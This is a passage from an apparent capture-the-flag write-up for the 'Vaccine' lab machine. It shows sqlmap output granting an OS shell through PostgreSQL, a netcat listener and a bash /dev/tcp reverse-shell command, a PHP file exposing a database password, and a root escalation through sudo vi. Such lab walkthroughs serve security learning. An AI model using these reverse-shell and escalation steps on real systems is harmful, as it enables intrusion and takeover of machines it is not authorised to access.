web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[20:08:23] [INFO] fingerprinting the back-end DBMS operating system
[20:08:24] [INFO] the back-end DBMS operating system is Linux
[20:08:24] [INFO] testing if current user is DBA
[20:08:25] [INFO] retrieved: ‘1’
[20:08:25] [INFO] going to use ‘COPY … FROM PROGRAM …’ command execution
[20:08:25] [INFO] calling Linux OS shell. To quit type ‘x’ or ‘q’ and press ENTER

Brilliant, this gave us an os-shell. In order to upgrade it to a full shell I needed to create a netcat listener and run a command on the server to get it to connect back to my host. First I created the netcat listener.

─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo nc -lvp 1234

Then I ran the command on the target server.

os-shell> bash -c ‘bash -i >& /dev/tcp/10.10.15.99/1234 0>&1

The command worked and the target server connected by to my host netcat listener.

10.10.10.46: inverse host lookup failed: Unknown host
connect to [10.10.15.199] from (UNKNOWN) [10.10.10.46] 38336
bash: cannot set terminal process group (1502): Inappropriate ioctl for device
bash: no job control in this shell
postgres@vaccine:/var/lib/postgresql/11/main$ whoami
postgres

Now that I had access to the server it was time to perform some further investigation. I checked the history and then started looking through the website files. I found one file called dashboard.php.

postgres@vaccine:/var/lib/postgresql/11/main$ cat /var/www/html/dashboard.php
if($_SESSION[‘login’] !== “true”) {
header(“Location: index.php”);
die();
}
try {
$conn = pg_connect(“host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!”);}

Bingo, we found a PHP database connection string with the postgres users password. I was then able to use the password to see what the postgres user had permissions to run.

postgres@vaccine:/var/lib/postgresql/11/main$ sudo -l
[sudo] password for postgres: P@s5w0rd!
Matching Defaults entries for postgres on vaccine:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

It appeared as that the postgres user had the ability to edit the pg_hba.conf configuration file using the vi tool. This was great news as vi has a built-in terminal that allows you to execute commands. After running the /bin/vi /etc/postgresql/11/main/pg_hba.conf command you can press escape and then type :!/bin/bash. This drop you in to a root shell where you can snag the root.txt file. There is no user.txt file on this target.

root@vaccine:/var/lib/postgresql/11/main# cat /root/root.txt
cat /root/root.txt
dd6XXXXXXXXXXXXXXXXXXXXXX849